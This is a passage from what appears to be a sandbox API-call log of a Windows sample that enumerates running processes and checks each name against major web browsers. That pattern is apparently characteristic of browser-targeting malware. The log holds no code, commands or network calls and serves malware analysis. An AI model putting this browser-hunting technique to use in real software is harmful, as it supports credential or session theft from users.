lpString2="microsoftedgecp.exe") returned 1 [0170.242] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.242] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0170.242] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0170.242] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0170.242] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0170.242] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.242] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0170.243] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0170.243] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0170.243] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0170.243] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0170.243] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.243] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.243] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0170.243] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0170.243] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0170.243] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0170.243] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.243] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0170.244] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0170.244] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0170.244] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0170.244] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0170.244] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.244] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0170.245] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0170.245] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0170.245] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0170.245] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0170.245] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.245] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0170.245] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0170.245] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0170.245] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0170.245] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0170.245] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.245] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0170.246] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0170.246] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0170.246] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0170.246] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0170.246] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.246] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.246] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.246] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.246] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.246] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.246] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.246] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.247] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.247] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.247] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.247] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.247] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.247] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.248] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.248] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.248] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.249] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.249] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.249] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.249] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.249] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.249] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0170.249] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0170.249] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0170.249] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0170.249] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0170.249] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.249] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.250] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.250] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.250] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.250] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.250] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.250] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.251] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.251] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.251] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.251] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.251] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.251] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0170.251] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0170.251] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0170.251] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0170.251] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0170.251] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.251] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0170.252] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0170.252] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0170.252] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0170.252] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0170.252] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.252] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0170.252] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0170.252] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0170.252] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0170.253] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0170.253] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.253] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.253] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.253] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.253] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.253] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.253] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.253] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0170.254] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0170.254] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0170.254] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0170.254] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0170.254] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.254] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0170.254] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0170.254] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0170.254] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0170.254] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0170.254] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.254] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0170.255] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0170.255] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0170.255] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0170.255] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0170.255] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.255] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0170.255] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0170.255] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0170.255] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0170.255] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0170.256] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.256] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0170.256] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0170.256] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0170.256] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0170.256] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0170.256] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.256] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0170.257] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0170.257] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0170.257] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0170.257] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0170.257] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.257] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0170.257] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0170.257] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0170.257] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0170.257] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0170.257] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.257] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0170.258] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0170.258] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0170.258] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0170.258] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0170.258] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.258] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0170.258] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0170.258] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0170.258] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0170.258] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0170.259] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.259] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0170.259] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0170.259] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0170.259] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0170.259] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0170.259] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.259] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0170.260] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0170.260] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0170.260] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0170.260] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0170.260] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.260] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0170.260] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0170.260] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0170.260] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0170.260] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0170.260] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.260] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0170.261] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0170.261] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0170.261] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0170.261] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0170.261] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.261] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0170.261] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0170.261] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0170.261] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0170.262] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0170.262] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.262] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0170.262] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0170.262] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0170.262] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0170.262] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0170.262] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.262] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0170.263] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0170.263] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0170.263] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0170.263] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0170.263] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.263] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0170.263] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0170.263] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0170.263] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0170.263] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0170.263] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.263] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0170.264] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0170.264] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0170.264] lstrcmpiA 